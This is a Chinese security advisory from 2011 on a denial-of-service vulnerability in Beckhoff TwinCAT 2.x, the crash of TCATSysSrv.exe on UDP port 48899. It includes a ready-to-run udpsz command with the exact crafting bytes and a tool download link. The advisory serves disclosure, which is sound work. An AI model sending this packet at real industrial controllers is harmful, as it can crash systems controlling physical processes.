发布日期：2011-09-13
更新日期：2011-09-13

受影响系统：

Beckhoff Automation TwinCAT 2.x

描述：

---

BUGTRAQ  ID: 49599

Beckhoff TwinCAT系统软件可通过多PLC 系统、NC 轴控制系统、编程环境和操作站，将任何兼容PC“改造”成为一台实时控制器。

TwinCAT System Service (TCATSysSrv.exe) 在处理某些数据报时存在拒绝服务漏洞，通过发送特制的数据报到UDP端口48899，造成崩溃。

<*来源：Luigi Auriemma （aluigi@pivx.com）
  
  链接：http://aluigi.altervista.org/adv/twincat_1-adv.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://aluigi.org/testz/udpsz.zip

  udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe

建议：

---

厂商补丁：

Beckhoff Automation
-------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

www.beckhoff.com/cn

浏览次数：2093
严重程度：0（网友投票）